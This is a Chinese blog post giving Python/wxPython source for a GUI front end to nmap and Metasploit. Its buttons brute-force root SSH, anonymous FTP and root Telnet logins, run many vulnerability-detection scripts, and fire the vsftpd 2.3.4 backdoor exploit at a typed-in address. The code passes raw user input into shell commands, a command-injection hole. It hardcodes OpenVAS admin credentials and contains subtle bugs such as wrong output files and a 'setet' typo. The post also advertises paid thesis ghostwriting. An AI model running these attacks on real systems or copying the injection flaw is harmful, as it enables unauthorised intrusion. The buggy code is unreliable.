python3 + wxpython 实现 基于 metasploit 的安全扫描工具
2018年8月2日17:02:00 【原创】
目录:python 编程博客 索引
1. 运行环境
最近打算使用 python3 写一个图形化的氨曲南扫描工具,主要使用 metasploit
另外我的环境使用了 wxpython 图形化模块,安装方法也很简单
pip install wxpython
wxpython 已经更新到版本 4.0 了,在这里的小软件中的环境是可以兼容使用的
系统运行环境为 kali linux 2018
代码写的仓促,实现的功能很应付,所以如果有人需要参考的话,还需要大量改动的。
本来是想用 metasploit 带的 API 接口编写的,后来发现有点复杂,没找到相关的文档,时间关系,用一天时间完成的这个代码,没有优化。
最近写毕设的同学问的有点多,我把框架图贴出来仅供参考
有代写毕业设计软件的可以在评论里翻我的联系方式,不贵。我写过的部分毕业设计在博客连接中有。
2. 功能简介
1. 读取 IP 和端口
2. 主机扫描、密码破解、漏洞扫描
3. 程序代码
# coding:UTF-8
import wx
import os
tc1data = 0
tc2data = 0
tc3data = 0
class MultiTextFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, None, -1, u"基于Metasploit的安全评估系统",size=(500, 220))
panel = wx.Panel(self, -1)
font = wx.Font(12, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
font.SetPointSize(14)
font2 = wx.Font(12, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add((-1, 20))
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
st1 = wx.StaticText(panel, label=u'目标地址')
st1.SetFont(font2)
hbox1.Add(st1, flag=wx.RIGHT, border=10)
self.tc1 = wx.TextCtrl(panel, value = "10.10.10.137",size=(100,30),style=wx.TE_MULTILINE | wx.TE_RICH2) # wx.HSCROLL 不自动换行
self.tc1.SetFont(font2)
hbox1.Add(self.tc1, proportion=1)
vbox.Add(hbox1, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=15)
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
st2 = wx.StaticText(panel, label=u'目标端口')
st2.SetFont(font2)
hbox3.Add(st2,flag=wx.LEFT, border=10)
self.tc2 = wx.TextCtrl(panel, value = "20-80",size=(100,30),style=wx.TE_MULTILINE | wx.TE_RICH2) # wx.HSCROLL 不自动换行
self.tc2.SetFont(font2)
hbox3.Add(self.tc2, proportion=1,flag=wx.LEFT, border=15)
st3 = wx.StaticText(panel, label=u'本地端口')
st3.SetFont(font2)
hbox3.Add(st3,flag=wx.LEFT, border=100)
self.tc3 = wx.TextCtrl(panel, value ="4444",size=(100,30),style=wx.TE_MULTILINE | wx.TE_RICH2 ) # wx.HSCROLL 不自动换行
self.tc3.SetFont(font2)
hbox3.Add(self.tc3, proportion=1,flag=wx.LEFT, border=10)
vbox.Add(hbox3, proportion=0, flag=wx.LEFT | wx.RIGHT,border=10)
vbox.Add(hbox3, flag=wx.ALIGN_CENTER_HORIZONTAL|wx.BOTTOM| wx.RIGHT, border=15)
hbox5 = wx.BoxSizer(wx.HORIZONTAL)
btn1 = wx.Button(panel, label=u'主机扫描', size=(100, 30))
btn1.SetFont(font)
hbox5.Add(btn1)
btn2 = wx.Button(panel, label=u'密码破解', size=(100, 30))
btn2.SetFont(font)
hbox5.Add(btn2, flag=wx.LEFT | wx.BOTTOM, border=30)
btn3 = wx.Button(panel, label=u'漏洞扫描', size=(100, 30))
btn3.SetFont(font)
hbox5.Add(btn3, flag=wx.LEFT | wx.BOTTOM, border=30)
vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border=10)
panel.SetSizer(vbox)
self.Bind(wx.EVT_BUTTON, self.hostScan, btn1)
self.Bind(wx.EVT_BUTTON, self.keyScan, btn2)
self.Bind(wx.EVT_BUTTON, self.vulnScan, btn3)
def hostScan(self, event):
global tc1data
global tc2data
global tc3data
tc1data = self.tc1.GetValue()
tc2data = self.tc2.GetValue()
tc3data = self.tc3.GetValue()
self.frame1 = Frame1(tc1data)
self.frame1.Show()
return True
def keyScan(self, event):
global tc1data
global tc2data
global tc3data
tc1data = self.tc1.GetValue()
tc2data = self.tc2.GetValue()
tc3data = self.tc3.GetValue()
self.frame2 = Frame2(tc1data)
self.frame2.Show()
return True
def vulnScan(self, event):
global tc1data
global tc2data
global tc3data
tc1data = self.tc1.GetValue()
tc2data = self.tc2.GetValue()
tc3data = self.tc3.GetValue()
self.frame3 = Frame3(tc1data)
self.frame3.Show()
return True
class Frame1(wx.Frame):
def __init__(self,tc1data,parent = None,id = -1, pos = wx.DefaultPosition,title = u"主机扫描",size=(400,200)):
wx.Frame.__init__(self,parent,id,title,pos,(400,200))
panel = wx.Panel(self, -1)
font = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
fontbt = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
fontms = wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False)
font.SetPointSize(9)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add((-1, 5))
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
st2 = wx.StaticText(panel, label=u'结果')
st2.SetFont(font)
hbox3.Add(st2,flag=wx.RIGHT, border=10) #密文区域左空间
self.tc2 = wx.TextCtrl(panel, size=(400,30),style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL | wx.TE_READONLY) # wx.HSCROLL 不自动换行
self.tc2.SetFont(fontms)
hbox3.Add(self.tc2, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox3, proportion=1, flag=wx.LEFT | wx.RIGHT |wx.EXPAND,border=10) #密文区域右空间
hbox5 = wx.BoxSizer(wx.HORIZONTAL)
btn1 = wx.Button(panel, label=u'主机扫描', size=(80, 30))
btn1.SetFont(font)
hbox5.Add(btn1, flag=wx.LEFT , border=15)
btn2 = wx.Button(panel, label=u'端口扫描', size=(80, 30))
btn2.SetFont(font)
hbox5.Add(btn2, flag=wx.LEFT ,border=15)
btn3 = wx.Button(panel, label=u'指纹扫描', size=(80, 30))
btn3.SetFont(font)
hbox5.Add(btn3, proportion=0,flag=wx.RIGHT|wx.LEFT, border=15)
vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL, border=30)
vbox.Add((-1, 15))
panel.SetSizer(vbox)
self.Bind(wx.EVT_BUTTON, self.hostScan, btn1)
self.Bind(wx.EVT_BUTTON, self.portScan, btn2)
self.Bind(wx.EVT_BUTTON, self.fingerScan, btn3)
def hostScan(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
scan1 = 'hostscan.txt'
os.system('nmap -sS %s -p %s> %s' % (tc1data,tc2data,scan1))
fo = open('tcpscan.txt')
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
def portScan(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
scan2 = 'portscan.txt'
os.system('nmap -sU -sS %s -p %s > %s' % (tc1data,tc2data,scan2))
fo = open(scan2)
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
def fingerScan(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
scan3 = 'fingerscan.txt'
os.system('nmap -v -A %s -p %s > %s' % (tc1data,tc2data,scan3))
fo = open('tcpscan.txt')
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
class Frame2(wx.Frame):
def __init__(self,tc1data,parent = None,id = -1, pos = wx.DefaultPosition,title = u"密码破解",size=(400,200)):
wx.Frame.__init__(self,parent,id,title,pos,(400,200))
panel = wx.Panel(self, -1)
font = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
fontbt = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
fontms = wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False)
font.SetPointSize(9)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add((-1, 5))
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
st2 = wx.StaticText(panel, label=u'结果')
st2.SetFont(font)
hbox3.Add(st2,flag=wx.RIGHT, border=10)
self.tc2 = wx.TextCtrl(panel, size=(400,30),style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL| wx.TE_READONLY) # wx.HSCROLL 不自动换行
self.tc2.SetFont(fontms)
hbox3.Add(self.tc2, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox3, proportion=1, flag=wx.LEFT | wx.RIGHT |wx.EXPAND,border=10)
hbox5 = wx.BoxSizer(wx.HORIZONTAL)
btn1 = wx.Button(panel, label=u'SSH', size=(80, 30))
btn1.SetFont(font)
hbox5.Add(btn1, flag=wx.LEFT , border=15)
btn2 = wx.Button(panel, label=u'FTP', size=(80, 30))
btn2.SetFont(font)
hbox5.Add(btn2, flag=wx.LEFT ,border=15)
btn3 = wx.Button(panel, label=u'TELNET', size=(80, 30))
btn3.SetFont(font)
hbox5.Add(btn3, proportion=0,flag=wx.RIGHT|wx.LEFT, border=15)
vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL, border=30)
vbox.Add((-1, 15))
panel.SetSizer(vbox)
self.Bind(wx.EVT_BUTTON, self.sshB, btn1)
self.Bind(wx.EVT_BUTTON, self.ftpB, btn2)
self.Bind(wx.EVT_BUTTON, self.telnetB, btn3)
def sshB(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
resfile = 'sshBfile.rb'
fo = open(resfile ,'w')
res = 'use auxiliary/scanner/ssh/ssh_login \n \
set RHOSTS %s \n \
set STOP_ON_SUCCESS true \n \
set USERNAME root\n \
set PASS_FILE pass.txt \n \
exploit \n \
sessions -l \n \
exit -y' % (RHOST)
fo.write(res)
fo.close()
bruter1 = 'ssh_login.txt'
os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
fo = open(bruter1)
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
def ftpB(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
resfile = 'ftpBfile.rb'
fo = open(resfile ,'w')
res = 'use auxiliary/scanner/ftp/ftp_login \n \
set RHOSTS %s\n \
set STOP_ON_SUCCESS true \n \
set USERNAME anonymous\n \
set PASS_FILE pass.txt \n \
exploit \n \
exit' % (RHOST)
fo.write(res)
fo.close()
bruter1 = 'ftp_login.txt'
os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
fo = open(bruter1)
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
def telnetB(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
resfile = 'telnetBfile.rb'
fo = open(resfile ,'w')
res = 'use auxiliary/scanner/telnet/telnet_login \n \
set RHOSTS %s \n \
setet STOP_ON_SUCCESS true \n \
set USERNAME root\n \
set PASS_FILE pass.txt \n \
exploit \n \
sessions -l \n \
exit -y' % (RHOST)
fo.write(res)
fo.close()
bruter1 = 'telnet_login.txt'
os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
fo = open(bruter1)
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
class Frame3(wx.Frame):
def __init__(self,tc1data,parent = None,id = -1, pos = wx.DefaultPosition,title = u"漏洞扫描",size=(400,200)):
wx.Frame.__init__(self,parent,id,title,pos,(400,200))
panel = wx.Panel(self, -1)
font = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
fontbt = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
fontms = wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False)
font.SetPointSize(9)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add((-1, 5))
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
st2 = wx.StaticText(panel, label=u'漏洞')
st2.SetFont(font)
hbox3.Add(st2,flag=wx.RIGHT, border=10)
self.tc2 = wx.TextCtrl(panel, size=(400,30),style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL| wx.TE_READONLY) # wx.HSCROLL 不自动换行
self.tc2.SetFont(fontms)
hbox3.Add(self.tc2, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox3, proportion=1, flag=wx.LEFT | wx.RIGHT |wx.EXPAND,border=10)
hbox5 = wx.BoxSizer(wx.HORIZONTAL)
btn1 = wx.Button(panel, label=u'漏洞扫描', size=(80, 30))
btn1.SetFont(font)
hbox5.Add(btn1, flag=wx.LEFT , border=15)
btn2 = wx.Button(panel, label=u'漏洞利用', size=(80, 30))
btn2.SetFont(font)
hbox5.Add(btn2, flag=wx.LEFT ,border=15)
btn3 = wx.Button(panel, label=u'查看报告', size=(80, 30))
btn3.SetFont(font)
hbox5.Add(btn3, proportion=0,flag=wx.RIGHT|wx.LEFT, border=15)
vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL, border=30)
vbox.Add((-1, 15))
panel.SetSizer(vbox)
self.Bind(wx.EVT_BUTTON, self.vulnScan, btn1)
self.Bind(wx.EVT_BUTTON, self.vulnExploit, btn2)
self.Bind(wx.EVT_BUTTON, self.vulnReport, btn3)
def vulnScan(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
nmap_s = 'nmap_s.log'
os.system('nmap -sT -Pn -v --script tftp-enum.nse,teamspeak2-version.nse,afp-path-vuln.nse,ftp-vuln-cve2010-4221.nse,\
http-huawei-hg5xx-vuln.nse,http-iis-webdav-vuln.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,\
http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3192.nse,\
http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,\
http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,\
http-vuln-cve2014-2129.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,\
http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,\
http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,\
http-vuln-wnr1000-creds.nse,mysql-vuln-cve2012-2122.nse,rdp-vuln-ms12-020.nse,rmi-vuln-classloader.nse,\
rsa-vuln-roca.nse,samba-vuln-cve-2012-1182.nse,smb2-vuln-uptime.nse,smb-vuln-conficker.nse,\
smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,\
smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,\
smb-vuln-regsvc-dos.nse,smtp-vuln-cve2010-4344.nse,smtp-vuln-cve2011-1720.nse,smtp-vuln-cve2\
011-1764.nse %s > %s' % (tc1data,nmap_s))
fo = open(nmap_s)
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
resfile = 'vulnScan.rb'
reportID = '454ceae9-0f50-4c7a-a289-69c8bf084958'
targetID = 'df3b1968-4b86-40b8-b415-aa9773f08980'
fo = open(resfile ,'w')
res = 'load openvas \n \
openvas_connect admin password 127.0.0.1 9390 ok \n \
openvas_task_list \n \
openvas_report_download %s c402cc3e-b531-11e1-9163-406186ea4fc5 . report_test.txt \n \
exit -y' % (reportID)
fo.write(res)
fo.close()
bruter1 = 'load_openvas.txt'
os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
fo = open(bruter1)
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
def vulnExploit(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
resfile = 'vsftpd_234.rb'
fo = open(resfile ,'w')
res = 'use exploit/unix/ftp/vsftpd_234_backdoor\n \
set RHOST %s \n \
exploit -j \n \
use auxiliary/scanner/ssh/ssh_login\n \
set RHOSTS %s\n \
set STOP_ON_SUCCESS true\n \
set USERNAME root\n \
set PASS_FILE pass.txt\n \
exploit\n \
exit -y' % (RHOST,RHOST)
fo.write(res)
fo.close()
bruter1 = 'vulnExploit.txt'
os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
fo = open(bruter1)
tcpscanmsg = fo.read()
fo.close()
self.tc2.AppendText(tcpscanmsg)
def vulnReport(self, event):
global tc1data
global tc2data
global tc3data
RHOST = tc1data
RPROT = tc2data
LPORT = tc3data
os.system('sed -n 34,40p report.txt > tmp.txt')
fo = open('tmp.txt')
reportmsg = fo.read()
fo.close()
self.tc2.AppendText(reportmsg)
os.system('evince report_test.pdf')
class MyApp(wx.App):
def __init__(self):
wx.App.__init__(self, redirect=False, filename=r"./IO.txt")
def OnInit(self):
frame = MultiTextFrame()
frame.Show(True)
return True
def main():
app = MyApp()
app.MainLoop()
if __name__ == "__main__":
main()